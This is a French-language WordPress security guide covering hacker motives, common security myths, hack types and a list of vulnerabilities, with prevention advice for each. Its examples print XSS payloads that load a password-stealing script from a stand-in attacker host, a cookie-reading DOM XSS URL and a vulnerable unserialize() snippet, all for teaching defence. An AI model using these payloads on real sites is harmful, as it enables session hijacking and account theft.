Sécurité WordPress : le guide ultime

La sécurité de WordPress peut être intimidante, mais ce n'est pas obligatoire. Dans ce guide complet sur la sécurité WordPress, nous avons simplifié les bases de la sécurisation de votre site Web WordPress afin que toute personne non technique puisse comprendre et protéger son site Web contre les attaques de pirates.

Ce guide de la sécurité WordPress est divisé en 10 sections faciles à digérer. Chaque section vous guidera à travers un aspect spécifique de la sécurité WordPress. À la fin du guide, vous apprendrez les différents types de vulnérabilités, les motivations des pirates et comment tout sécuriser, de votre serveur aux utilisateurs individuels de votre site Web WordPress.

Plongeons-nous !

Section 1 : WordPress est-il sécurisé ?

WordPress est-il sécurisé ? La reponse courte est oui.

WordPress a-t-il des problèmes de sécurité ?

Bien que WordPress lui-même soit sécurisé, éviter les erreurs de sécurité WordPress nécessite un peu d'effort de la part des propriétaires de sites. La vérité est que le plus gros problème de sécurité de WordPress réside dans ses utilisateurs. La plupart des hacks WordPress sur la plate-forme peuvent être évités avec un petit effort de la part des propriétaires du site.

Ne vous inquiétez pas, nous avons ce qu'il vous faut. Ce guide vous apprendra tout ce que vous devez savoir sur la sécurité de votre site Web.

Avant de pouvoir sécuriser nos sites Web, nous devons d'abord comprendre cinq choses.

1. Pourquoi les pirates attaquent les sites Web
2. Les différents types de hacks WordPress
3. Types spécifiques de vulnérabilités WordPress
4. Comment prévenir les vulnérabilités WordPress
5. Comment déterminer la gravité d'une vulnérabilité

Pourquoi un pirate attaquerait-il mon site Web ?

Il s'agit d'une question de sécurité WordPress courante que vous pourriez poser lorsque votre pire cauchemar commence à se réaliser. Pourquoi un pirate attaquerait-il mon site Web ? Rassurez-vous, les chances que l'attaque soit personnelle sont minces, voire nulles. Les pirates ont des motivations sous-jacentes qui n'ont rien à voir avec le contenu de votre site Web. Les pirates informatiques ne se soucient généralement pas de savoir si votre site Web est une page de charité pour les chiots sans-abri ou un site avec des tonnes de produits sympas à vendre.

Cependant, il est difficile de ne pas se sentir visé lorsqu'une identité sans visage a piraté votre site Web, provoquant chaos et troubles. Vous vous sentez stressé et vous avez l'impression que la situation échappe à votre contrôle. Vous vous sentez personnellement attaqué et vous vous demandez s'il y avait un moyen d'empêcher l'attaque de se produire. Vous pourriez même vous demander s'il est possible de récupérer l'épave de votre site Web.

Alors, qu'est-ce qui fait qu'un pirate cible un site Web ? Cela n'a rien à voir avec votre site Web, les sujets qu'il couvre ou quelque chose du genre. En réalité, les pirates ciblent le logiciel que votre site Web utilise pour rester opérationnel. En piratant ce logiciel, ils peuvent voler des données clients sensibles ou même prendre le contrôle de votre site WordPress.

Malheureusement, avec sa popularité croissante, WordPress est également devenu une cible pour les pirates. Si un plugin WordPress populaire présente une vulnérabilité sérieuse, un pirate informatique a potentiellement les plans pour s'emparer de centaines de milliers, voire de millions de sites Web. Heureusement, la plupart des vulnérabilités des plugins sont rapidement corrigées par leurs développeurs.

En pouvant mettre la main sur des informations sensibles et privées, les pirates peuvent ensuite les vendre pour un revenu ou même détenir la rançon des données, obligeant essentiellement les gens à payer pour récupérer leurs informations en de bonnes mains.

Alors, quelle est la principale motivation des hackers ?

Pour créer des flux de trésorerie pour eux-mêmes.

Internet est un lieu lucratif qui offre à tous les horizons la possibilité de générer un salaire décent. Cependant, cela ne signifie pas que tout le monde s'y prend d'une manière légale et moralisatrice. Les pirates font des profits élevés même sur le plus petit site Web.

L'argent est toute la motivation dont ils ont besoin, mais certains apprécient le sentiment de pouvoir qu'ils obtiennent lorsqu'ils réussissent à pirater un site Web, mais la grande majorité est dans l'entreprise uniquement pour l'argent.

Section 2 : Les 5 principaux mythes sur la sécurité WordPress démystifiés

Avant de passer au reste de ce guide de sécurité WordPress, prenons une minute pour démystifier certains mythes sur la sécurité WordPress.

Vous trouverez de nombreux conseils de sécurité WordPress sur Internet provenant de personnes bien intentionnées qui veulent vraiment aider. Malheureusement, certains de ces conseils sont basés sur les mythes de la sécurité WordPress et n'ajoutent en fait aucune sécurité supplémentaire à votre site Web WordPress. En fait, certains « conseils » de sécurité WordPress peuvent augmenter la probabilité que vous rencontriez des problèmes et des conflits.

Nous avons le choix entre de nombreux mythes sur la sécurité WordPress, mais nous allons nous concentrer uniquement sur le top 5 que nous avons régulièrement vu dans plus de 30 000 tickets de support. Ces conversations avec nos clients ont servi de base aux critères suivants pour sélectionner les principaux mythes de la sécurité WordPress :

1. La fréquence à laquelle le mythe a été mentionné.
2. Le nombre de maux de tête que le mythe a causé.
3. Le faux sentiment de sécurité que donne le mythe.

1. Vous devez masquer votre URL /wp-admin ou /wp-login (également appelée Hide Backend)

L'idée derrière le fait de cacher le wp-admin est que les pirates ne peuvent pas pirater ce qu'ils ne peuvent pas trouver. Si votre URL de connexion n'est pas l'URL WordPress /wp-admin/ standard, n'êtes-vous pas protégé contre les attaques par force brute ?

La vérité est que la plupart des fonctionnalités de Hide Backend sont simplement une sécurité par l'obscurité, ce qui n'est pas une stratégie de sécurité WordPress à toute épreuve. Bien que le fait de masquer votre URL backend wp-admin puisse aider à atténuer certaines des attaques sur votre connexion, cette approche ne les arrêtera pas toutes.

Nous recevons fréquemment des tickets d'assistance de personnes perplexes quant à la façon dont iThemes Security Pro signale les tentatives de connexion invalides lorsqu'elles ont masqué leur connexion. C'est parce qu'il existe d'autres moyens de se connecter à vos sites WordPress en plus d'utiliser un navigateur, comme l'utilisation de XML-RPC ou de l'API REST. Sans oublier qu'après avoir modifié l'URL de connexion, un autre plugin ou thème pourrait toujours être lié à la nouvelle URL.

En fait, la fonctionnalité Hide Backend ne change vraiment rien. Oui, cela empêche la plupart des utilisateurs d'accéder directement à l'URL de connexion par défaut. Mais une fois que quelqu'un a entré l'URL de connexion personnalisée, il est redirigé vers l'URL de connexion WordPress par défaut.

La personnalisation de l'URL de connexion est également connue pour provoquer des conflits. Il existe des plugins, des thèmes ou des applications tierces qui codent en dur wp-login.php dans leur base de code. Ainsi, lorsqu'un logiciel codé en dur recherche yoursite.com/wp-login.php, il trouve une erreur à la place.

2. Vous devez masquer le nom de votre thème et le numéro de version de WordPress

Si vous utilisez les outils de développement de votre navigateur, vous pouvez voir assez rapidement le nom du thème et le numéro de version de WordPress s'exécutant sur un site WordPress. La théorie derrière le fait de cacher le nom de votre thème et la version WP est que si les attaquants ont ces informations, ils auront le plan pour pénétrer dans votre site.

Par exemple, en regardant la capture d'écran ci-dessus, vous pouvez voir que ce site utilise le Twenty Twenty-One et que la version WordPress est 5.6.

Le problème avec ce mythe de la sécurité WordPress est qu'il n'y a pas un vrai gars derrière un clavier à la recherche de la combinaison parfaite de thème et de numéro de version WordPress à attaquer. Cependant, il existe des robots insensés qui parcourent Internet à la recherche de vulnérabilités connues dans le code réel exécuté sur votre site Web, donc masquer le nom de votre thème et le numéro de version de WP ne vous protégera pas.

3. Vous devez renommer votre répertoire wp-content

Le répertoire wp-content contient vos plugins, thèmes et dossier de téléchargement de médias. C'est une tonne de bonnes choses et de code exécutable dans un seul répertoire, il est donc compréhensible que les gens veuillent être proactifs et sécuriser ce dossier.

Malheureusement, c'est un mythe de sécurité WordPress selon lequel changer le nom de wp-content ajoutera une couche de sécurité supplémentaire au site. Ce ne sera pas le cas. Nous pouvons facilement trouver le nom de votre répertoire wp-content modifié en utilisant les outils de développement du navigateur. Dans la capture d'écran ci-dessous, nous pouvons voir que j'ai renommé le répertoire de contenu de ce site en /test/.

Changer le nom du répertoire n'ajoutera aucune sécurité à votre site, mais cela peut provoquer des conflits pour les plugins qui ont le chemin du répertoire /wp-content/ codé en dur.

4. Mon site Web n'est pas assez grand pour attirer l'attention des pirates informatiques

Ce mythe de la sécurité WordPress laisse de nombreux sites vulnérables aux attaques. Même si vous êtes propriétaire d'un petit site à faible trafic, il est toujours crucial pour vous d'être proactif dans la sécurisation de votre site Web.

Même si vous êtes propriétaire d'un petit site à faible trafic, il est toujours crucial pour vous d'être proactif dans la sécurisation de votre site Web.

La vérité est que votre site ou votre entreprise n'a pas besoin d'être grand pour attirer l'attention d'un attaquant potentiel. Les pirates voient toujours une opportunité d'utiliser votre site comme canal pour rediriger certains de vos visiteurs vers des sites malveillants, envoyer du spam depuis votre serveur de messagerie, propager des virus ou même exploiter Bitcoin. Ils prendront tout ce qu'ils peuvent obtenir.

5. WordPress est une plate-forme non sécurisée

Le mythe de sécurité WordPress le plus dommageable est que WordPress lui-même n'est pas sécurisé. Ce n'est tout simplement pas vrai. WordPress est le système de gestion de contenu le plus populaire au monde, et cela n'a pas été le cas en ne prenant pas la sécurité au sérieux.

Section 3 : WordPress Hacks et vulnérabilités WordPress

4 types de hacks WordPress

Lorsqu'il s'agit de comprendre la sécurité de WordPress, il est important de comprendre

1. Spam de référencement

Une autre motivation pour qu'un pirate informatique attaque votre site Web est de profiter des avantages du spam SEO. Le référencement, ou l'optimisation des moteurs de recherche, est ce que les moteurs de recherche utilisent pour indexer ou classer votre site Web. En utilisant certains mots-clés, placés stratégiquement dans vos pages Web et vos articles de blog, vous pouvez aider votre site Web à se classer plus haut dans les recherches Google. Cela générera du trafic vers votre site Web et peut vous aider à réaliser un profit qui en vaut la peine.

Les pirates savent tout sur le référencement, et ils l'utilisent à leur avantage. Lorsque votre site Web a été compromis, les pirates informatiques installent une porte dérobée sur votre site Web. Cela leur permet de contrôler à distance vos mots-clés et le contenu de votre site Web. Ils redirigeront souvent le trafic de votre site Web, le redirigeant directement vers le leur, passant complètement sur le vôtre.

Cela laissera votre public cible confus et frustré, détruisant la réputation et la crédibilité de votre site Web. Les visiteurs de votre site Web seront souvent redirigés vers des sites qui sont manifestement des arnaques, et ils hésiteront à revisiter votre site Web à l'avenir.

Comme si cela ne suffisait pas, les pirates informatiques qui utilisent cette approche donnent une mauvaise image de votre site Web aux moteurs de recherche, et pas seulement aux autres êtres humains. Votre site Web n'aura plus l'air légitime et son classement s'effondrera rapidement. Sans un classement élevé dans les recherches, votre site deviendra l'un des millions qui n'obtiendront jamais plus de quelques visites par mois.

2. Injections de logiciels malveillants

De nombreux pirates attaquent votre site Web dans l'intention de l'infecter avec des logiciels malveillants. Les logiciels malveillants sont de minuscules morceaux de code qui peuvent être utilisés pour apporter des modifications malveillantes sur votre site Web. Si votre site est infecté par des logiciels malveillants, il est important d'être alerté dès que possible.

Chaque minute où un malware reste sur votre site Web, il fait plus de dégâts à votre site Web. Plus votre site Web est endommagé, plus il vous faudra de temps pour nettoyer et restaurer votre site Web. Il est essentiel de vérifier la santé de votre site Web en recherchant régulièrement les logiciels malveillants. C'est pourquoi il est essentiel de vérifier en permanence la santé de votre site Web en recherchant les logiciels malveillants.

3. Ransomware

Un pirate pourrait vouloir attaquer votre site Web pour le conserver contre rançon. Le ransomware fait référence au moment où un pirate informatique prend le contrôle de votre site Web ne vous le rendra pas à moins que vous ne leur payiez des frais élevés. Le temps d'arrêt moyen d'une attaque de ransomware est de 9,5 jours. Combien de revenus 10 jours sans vente vous coûteraient-ils ?

La rançon moyenne demandée par les pirates a considérablement augmenté, passant de 294 $ en 2015 à bien plus de 13 000 $ en 2020. Avec ce type de paiements, le commerce de la criminalité en ligne ne ralentit pas. Il devient de plus en plus essentiel de sécuriser et de protéger correctement votre site Web à mesure que les communautés criminelles comme celle-ci se développent.

4. Dégradation du site Web

Certains pirates peuvent attaquer votre site Web pour s'amuser un peu. Un style de piratage qui est moins mauvais en soi est celui des défaceurs de sites Web. Ce sont généralement des enfants ou de jeunes adultes qui commencent tout juste à jouer avec leurs compétences en piratage. Ils font des hacks comme ceux-ci pour s'entraîner et améliorer leurs compétences.

Lorsque nous parlons d'un site Web dégradé, pensez aux graffitis. Les attaquants modifieront complètement l'apparence de votre site Web, parfois de manière amusante ou farfelue. Les défaceurs de sites Web typiques font leurs actions pour le plaisir ou comme moyen de se montrer. Ils posteront souvent des photos de leurs méfaits, essayant de s'affronter pour gagner le prix de la meilleure dégradation.

La bonne nouvelle est que cette forme de piratage est moins dangereuse pour vous. De plus, comme ce sont principalement des adolescents et d'autres pirates informatiques amateurs qui effectuent les dégradations, ils sont plus faciles à détecter et à supprimer de votre site Web que d'autres formes de logiciels malveillants. Ils peuvent généralement être détectés par des scanners et supprimés rapidement.

21 vulnérabilités WordPress courantes expliquées

Malheureusement, des vulnérabilités WordPress existent. Des vulnérabilités WordPress peuvent exister dans vos plugins, vos thèmes et même le noyau WordPress. Et puisque WordPress alimente désormais près de 40 % de tous les sites Web, la tâche de comprendre les vulnérabilités est encore plus importante. En termes simples : vous devez être vigilant sur la sécurité de votre site Web.

Si vous n'êtes pas un expert en sécurité WordPress, comprendre toutes les différentes vulnérabilités de WordPress peut être intimidant. Il peut également être difficile d'essayer de comprendre les différents niveaux de gravité d'une vulnérabilité, ainsi que les risques de la vulnérabilité WordPress.

Ce guide définira les 21 vulnérabilités WordPress les plus courantes, expliquera comment évaluer la gravité d'une vulnérabilité WordPress, donnera des exemples de la façon dont un pirate informatique peut exploiter la vulnérabilité et montrera comment ces vulnérabilités peuvent être évitées. Plongeons-nous.

Qu'est-ce qu'une vulnérabilité WordPress ?

Une vulnérabilité WordPress est une faiblesse ou une faille dans un thème, un plugin ou un noyau WordPress qui peut être exploitée par un pirate informatique. En d'autres termes, les vulnérabilités de WordPress créent un point d'entrée qu'un pirate peut utiliser pour réaliser une activité malveillante.

Gardez à l'esprit que le piratage de sites Web est presque entièrement automatisé. Pour cette raison, les pirates peuvent facilement pénétrer dans un grand nombre de sites Web en un rien de temps. Les pirates utilisent des outils spéciaux qui analysent Internet, à la recherche de vulnérabilités connues.

Les pirates aiment les cibles faciles, et avoir un site Web qui exécute un logiciel avec des vulnérabilités connues, c'est comme donner à un pirate les instructions étape par étape pour pénétrer dans votre site Web WordPress, votre serveur, votre ordinateur ou tout autre appareil connecté à Internet.

Nos rapports mensuels de synthèse des vulnérabilités WordPress couvrent toutes les vulnérabilités du noyau WordPress, du plugin WordPress et des thèmes divulgués publiquement. Dans ces rafles, nous partageons le nom du plugin ou du thème vulnérable, les versions affectées et le type de vulnérabilité.

Qu'est-ce que la vulnérabilité Zero-Day ?

En ce qui concerne la sécurité de WordPress, il est important de comprendre la définition d'une vulnérabilité zero-day. Étant donné que la vulnérabilité a été divulguée au public, le développeur a zéro jour pour corriger la vulnérabilité. Et cela peut avoir de grandes implications pour vos plugins et thèmes.

En règle générale, un chercheur en sécurité découvrira une vulnérabilité et divulguera en privé la vulnérabilité aux développeurs de l'entreprise qui possèdent le logiciel. Le chercheur en sécurité et le développeur conviennent que tous les détails seront publiés une fois qu'un correctif sera disponible. Il peut y avoir un léger retard dans la divulgation de la vulnérabilité après la publication du correctif pour donner à davantage de personnes le temps de se mettre à jour pour les vulnérabilités de sécurité majeures.

Cependant, si un développeur ne répond pas au chercheur en sécurité ou ne fournit pas de correctif pour la vulnérabilité, le chercheur peut alors divulguer publiquement la vulnérabilité pour faire pression sur le développeur pour qu'il publie un correctif.

Divulguer publiquement une vulnérabilité et introduire apparemment un jour zéro peut sembler contre-productif. Mais c'est le seul levier dont dispose un chercheur pour faire pression sur le développeur pour qu'il corrige la vulnérabilité.

Le Project Zero de Google a des directives similaires en ce qui concerne la divulgation des vulnérabilités. Ils publient tous les détails de la vulnérabilité après 90 jours. Si la vulnérabilité a été corrigée ou non.

La vulnérabilité est là pour que tout le monde puisse la trouver. Si un pirate informatique trouve la vulnérabilité avant que le développeur ne publie un correctif, cela devient le pire cauchemar pour l'utilisateur final…. Un zero-day activement exploité.

Qu'est-ce qu'une vulnérabilité zero-day exploitée activement ?

Une vulnérabilité Zero-Day activement exploitée est exactement ce que cela ressemble. Il s'agit d'une vulnérabilité non corrigée que les pirates ciblent, attaquent et exploitent activement.

Fin 2018, des pirates exploitaient activement une grave vulnérabilité WordPress dans le plugin WP GDPR Compliance. L'exploit a permis aux utilisateurs non autorisés - plus à ce sujet dans la section suivante - de modifier les paramètres d'enregistrement des utilisateurs WP et de changer le nouveau rôle d'utilisateur par défaut d'abonné à administrateur.

Ces pirates ont découvert cette vulnérabilité avant le plugin WP GDPR Compliance et les chercheurs en sécurité. Ainsi, tout site Web sur lequel le plug-in était installé était une marque facile et garantie pour les cybercriminels.

Comment vous protéger d'une vulnérabilité Zero-Day

Le meilleur moyen de protéger votre site Web contre une vulnérabilité Zero-Day est de désactiver et de supprimer le logiciel jusqu'à ce que la vulnérabilité soit corrigée. Heureusement, les développeurs du plugin WP GDPR Compliance ont agi rapidement et ont publié un correctif pour la vulnérabilité le lendemain de sa divulgation publique.

Les vulnérabilités non corrigées font de votre site Web une cible facile pour les pirates.

Vulnérabilités WordPress non authentifiées ou authentifiées

Il y a deux autres termes que vous devez connaître lorsque vous parlez des vulnérabilités de WordPress.

1. Non authentifié – Une vulnérabilité WordPress non authentifiée signifie que n'importe qui peut exploiter la vulnérabilité.
2. Authentifié – Une vulnérabilité WordPress authentifiée signifie qu'elle nécessite un utilisateur connecté pour l'exploiter.

Une vulnérabilité qui nécessite un utilisateur authentifié est beaucoup plus difficile à exploiter pour un pirate informatique, surtout si elle nécessite des privilèges de niveau administrateur. Et, si un pirate informatique a déjà mis la main sur un ensemble d'informations d'identification d'administrateur, il n'a vraiment pas besoin d'exploiter une vulnérabilité pour faire des ravages.

Il y a une mise en garde. Certaines vulnérabilités authentifiées ne nécessitent que des capacités au niveau de l'abonné pour être exploitées. Si votre site Web permet à quiconque de s'inscrire, il n'y a vraiment pas beaucoup de différence entre cela et une vulnérabilité non authentifiée.

En ce qui concerne les vulnérabilités WordPress, il existe 21 types courants de vulnérabilités. Voyons chacun de ces types de vulnérabilité WordPress.

1. Contournement d'authentification

Une vulnérabilité de contournement d'authentification permet à un attaquant d'ignorer les exigences d'authentification et d'effectuer des tâches normalement réservées aux utilisateurs authentifiés.

L'authentification est le processus de vérification de l'identité d'un utilisateur. WordPress demande aux utilisateurs de saisir un nom d'utilisateur et un mot de passe pour vérifier leur identité.

Exemple de contournement d'authentification

Les applications vérifient l'authentification sur la base d'un ensemble fixe de paramètres. Un attaquant pourrait modifier ces paramètres pour accéder aux pages Web qui nécessitent généralement une authentification.

Un exemple très basique de quelque chose comme ceci est un paramètre d'authentification dans l'URL.

 https:/my-website/some-plugint?param=authenticated&param=no

L'URL ci-dessus a un paramètre d'authentification qui a la valeur no. Ainsi, lorsque nous visitons cette page, nous recevrons un message nous informant que nous ne sommes pas autorisés à afficher les informations de cette page.

Cependant, si la vérification d'authentification était mal codée, un attaquant pourrait modifier le paramètre d'authentification pour accéder à la page privée.

 https:/my-website/some-plugint?param=authenticated&param=yes

Dans cet exemple, un pirate pourrait modifier la valeur d'authentification dans l'URL sur yes pour contourner l'exigence d'authentification pour afficher la page.

Comment empêcher la prévention de contournement d'authentification

Vous pouvez aider à protéger votre site Web contre les vulnérabilités d'authentification brisée en utilisant l'authentification à deux facteurs.

2. Vulnérabilité de la porte dérobée

Une vulnérabilité Backdoor permet aux utilisateurs autorisés et non autorisés de contourner les mesures de sécurité WordPress normales et d'obtenir un accès de haut niveau à un ordinateur, un serveur, un site Web ou une application.

Exemple de porte dérobée

Un développeur crée une porte dérobée afin de pouvoir basculer rapidement entre le codage et le test du code en tant qu'utilisateur administrateur. Malheureusement, le développeur oublie de supprimer la porte dérobée avant que le logiciel ne soit rendu public.

Si un pirate informatique trouve la porte dérobée, il peut exploiter le point d'entrée pour obtenir un accès administrateur au logiciel. Maintenant que le pirate a un accès administrateur, il peut faire toutes sortes de choses malveillantes comme injecter des logiciels malveillants ou voler des données sensibles.

Comment empêcher une porte dérobée

De nombreuses portes dérobées peuvent se résumer à un seul problème, une mauvaise configuration de la sécurité. Les problèmes de mauvaise configuration de la sécurité de WordPress peuvent être atténués en supprimant toutes les fonctionnalités inutilisées du code, en gardant toutes les bibliothèques à jour et en rendant les messages d'erreur plus généraux.

3. Vulnérabilité d'injection d'objet PHP

Une vulnérabilité PHP Object-Injection se produit lorsqu'un utilisateur soumet une entrée qui n'est pas filtrée (ce qui signifie que les caractères illégaux ne sont pas supprimés) avant d'être transmise à la fonction PHP unserialized() .

Exemple d'injection d'objet PHP

Voici un exemple réel d'une vulnérabilité PHP Object-Injection dans le plugin WordPress Sample Ads Manager qui a été initialement signalé par sumofpwn.

Le problème est dû à deux appels non sécurisés à unserialize() dans le fichier de plugins sam-ajax-loader.php . L'entrée est prise directement à partir de la requête POST comme on peut le voir dans le code ci-dessous.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Ce problème pourrait entraîner la saisie et l'exécution d'un code malveillant par un attaquant.

Comment empêcher l'injection d'objets PHP

N'utilisez pas la fonction unserialize() avec une entrée fournie par l'utilisateur, utilisez plutôt les fonctions JSON.

4. Vulnérabilité des scripts intersites

Une vulnérabilité XSS ou Cross-Site Scripting se produit lorsqu'une application Web permet aux utilisateurs d'ajouter du code personnalisé dans le chemin d'URL. Un attaquant peut exploiter la vulnérabilité pour exécuter un code malveillant dans le navigateur Web de la victime, créer une redirection vers un site Web malveillant ou détourner une session utilisateur.

Il existe trois principaux types de XSS, réfléchis. stocké et basé sur DOM

5. Vulnérabilité reflétée des scripts intersites

Un Cross Site-Réfléchie XSS ou Réfléchie script se produit lorsqu'un script malveillant est envoyé dans une requête-client demande faite par vous dans un navigateur à un serveur et est réfléchie par le serveur et exécuté par votre navigateur.

Exemple de script intersites reflété

Disons que yourfavesite.com nécessite que vous soyez connecté pour afficher une partie du contenu du site Web. Et disons que ce site Web ne parvient pas à encoder correctement les entrées des utilisateurs.

Un attaquant pourrait tirer parti de cette vulnérabilité en créant un lien malveillant et en le partageant avec les utilisateurs de yourfavesite.com dans des e-mails et des publications sur les réseaux sociaux.

L'attaquant utilise un outil de raccourcissement d'URL pour que le lien malveillant semble non menaçant et très cliquable, yourfavesite.com/cool-stuff . Mais, lorsque vous cliquez sur le lien raccourci, le lien complet est exécuté par votre navigateur yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

Après avoir cliqué sur le lien, vous serez redirigé vers yourfavesite.com , et le script malveillant sera automatiquement répercuté à votre navigateur, ce qui permet à l'attaquant de pirater vos cookies de session et yourfavesite.com compte.

Comment empêcher les scripts intersites réfléchis

La règle n°5 de l'aide-mémoire de prévention des scripts croisés OWASP consiste à coder l'URL avant d'insérer des données non fiables dans les valeurs de paramètre d'URL HTML. Cette règle peut aider à empêcher la création d'une vulnérabilité XSS reflétée lors de l'ajout de données non fiables dans la valeur du paramètre HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Vulnérabilité des scripts intersites stockés

Une vulnérabilité Stored XSS ou Stored Cross-Site Scripting permet aux pirates d'injecter du code malveillant et de le stocker sur le serveur d'une application Web.

Exemple de script intersites stocké

Un attaquant découvre que yourfavesite.com permet aux visiteurs d'intégrer des balises HTML dans la section des commentaires du site. L'attaquant crée donc un nouveau commentaire :

Excellent article! Consultez cet autre excellent article <script src=”http://bad-guys.com/passwordstealingcode.js> connexe. </script>

Remarque : une vulnérabilité XSS reflétée obligerait un visiteur à cliquer sur le lien de code malveillant pour s'exécuter. Une attaque XSS stockée ne nécessite que la page qui contient le commentaire à visiter. Le code malveillant s'exécute à chaque chargement de page.

Maintenant que notre méchant a ajouté le commentaire, chaque futur visiteur de cette page sera exposé à son script malveillant. Le script est hébergé sur le site Web du méchant et a la capacité de détourner les cookies de session des visiteurs et les comptes yourfavesite.com .

Comment empêcher les scripts intersites stockés

La règle n°1 de l'aide-mémoire de prévention des scripts croisés OWASP est l'encodage HTML avant d'ajouter des données non fiables dans des éléments HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Codage des caractères suivants pour empêcher le basculement dans un contexte d'exécution, tel qu'un script, un style ou des gestionnaires d'événements. L'utilisation d'entités hexadécimales est recommandée dans la spécification.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Vulnérabilité des scripts intersites basés sur un modèle d'objet de document

Une vulnérabilité XSS basée sur DOM ou Document Object Model-Based Cross-Site Scripting se produit lorsqu'un script côté client d'un site Web écrit des données fournies par l'utilisateur dans le Document Object Model (DOM). Le site Web lit ensuite l'utilisateur daté du DOM et le transmet au navigateur Web du visiteur.

Si les données fournies par l'utilisateur ne sont pas correctement gérées, un attaquant pourrait injecter un code malveillant qui serait exécuté lorsque le site Web lit le code à partir du DOM.

Remarque : le XSS réfléchi et stocké est un problème côté serveur, tandis que le XSS basé sur DOM est un problème client (navigateur).

Exemple de script inter-sites basé sur un modèle d'objet de document

Une façon courante d'expliquer une attaque DOM XSS est une page d'accueil personnalisée. Après avoir créé un compte, disons que yourfavesite.com vous êtes redirigé vers une page d'accueil personnalisée pour vous accueillir nommément à l'aide du code ci-dessous. Et le nom d'utilisateur est encodé dans l'URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Ainsi, nous aurions une URL de yourfavesite.com/account?name=yourname .

Un attaquant pourrait accomplir une attaque XSS basée sur DOM en envoyant l'URL suivante au nouvel utilisateur :

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Lorsque le nouvel utilisateur clique sur le lien, son navigateur envoie une demande pour :

 /account?name=<script>alert(document.cookie)</script>

à bad-guys.com . Le site Web répond avec la page contenant le code Javascript ci-dessus.

Le navigateur du nouvel utilisateur crée un objet DOM pour la page, dans lequel l'objet document.location contient la chaîne :

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Le code d'origine de la page ne s'attend pas à ce que le paramètre par défaut contienne un balisage HTML, faisant écho au balisage sur la page. Ensuite, le navigateur du nouvel utilisateur affichera la page et exécutera le script de l'attaquant :

 alert(document.cookie)

Comment empêcher les scripts intersites basés sur DOM

La règle n°1 de l'aide-mémoire pour la prévention des scripts intersites basés sur Dom OWASP est l'échappement HTML. Ensuite, JS s'échappe avant d'ajouter des données non fiables dans le sous-contexte HTML dans le contexte d'exécution.

Exemples de méthodes HTML dangereuses :

Les attributs

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Méthodes

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Pour sécuriser les mises à jour dynamiques du HTML dans le DOM, l'OWASP recommande :

1. encodage HTML, puis
2. JavaScript encodant toutes les entrées non fiables, comme indiqué dans ces exemples :

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Vulnérabilité de falsification des demandes intersites

Une vulnérabilité CSRF ou Cross-Site Request Forgery se produit lorsqu'un cybercriminel incite un utilisateur à effectuer des actions involontaires. L'attaquant falsifie la requête de l'utilisateur à une application.

Exemple de falsification de requête intersites

Dans notre résumé des vulnérabilités WordPress de janvier 2020, nous avons signalé la vulnérabilité de falsification des demandes intersites trouvée dans le plugin Code Snippets. (Le plugin a été rapidement patché dans la version 2.14.0)

L'absence de protection CRSF du plugin permettait à n'importe qui de falsifier une requête au nom d'un administrateur et d'injecter du code exécutable sur un site vulnérable. Un attaquant aurait pu profiter de cette vulnérabilité pour exécuter du code malveillant et même effectuer une prise de contrôle complète du site.

Comment empêcher la falsification des demandes intersites

La plupart des frameworks de codage ont des défenses de jetons synchronisées intégrées pour se protéger contre CSRF, et ils doivent être utilisés.

Il existe également des composants externes tels que le projet CSRF Protector qui peuvent être utilisés pour protéger les vulnérabilités PHP et Apache CSRF.

9. Vulnérabilité de contrefaçon de requête côté serveur

Une vulnérabilité SSRF ou Server-Site Request Forger permet à un attaquant de tromper une application côté serveur pour envoyer des requêtes HTTP à un domaine arbitraire de son choix.

Exemple de falsification de requête côté serveur

Une vulnérabilité SSRF pourrait être exploitée pour mener une attaque de type Reflected Cross-Site Scripting. Un attaquant pourrait récupérer un script malveillant sur bad-guys.com et le diffuser à tous les visiteurs d'un site Web.

Comment empêcher la falsification des demandes côté serveur

La première étape pour atténuer les vulnérabilités SSRF consiste à valider les entrées. Par exemple, si votre serveur s'appuie sur des URL fournies par l'utilisateur pour récupérer différents fichiers, vous devez valider l'URL et autoriser uniquement les hôtes cibles auxquels vous faites confiance.

Pour plus d'informations sur la prévention de la SSRF, consultez l'aide-mémoire de l'OWASP.

10. Vulnérabilité d'escalade de privilèges

Une vulnérabilité d' escalade de privilèges permet à un attaquant d'exécuter des tâches qui nécessitent normalement des privilèges de niveau supérieur.

Exemple d'escalade de privilèges

Dans notre résumé des vulnérabilités WordPress de novembre 2020, nous avons signalé une vulnérabilité d'escalade de privilèges trouvée dans le plugin Ultimate Member (la vulnérabilité a été corrigée dans la version 2.1.12).

Un attaquant pourrait fournir un paramètre de tableau pour la méta utilisateur wp_capabilities qui définit le rôle d'un utilisateur. Au cours du processus d'enregistrement, les détails d'enregistrement soumis ont été transmis à la fonction update_profile , et toutes les métadonnées respectives qui ont été soumises, indépendamment de ce qui a été soumis, seraient mises à jour pour cet utilisateur nouvellement enregistré.

La vulnérabilité a essentiellement permis à un nouvel utilisateur de demander à l'administrateur lors de l'enregistrement.

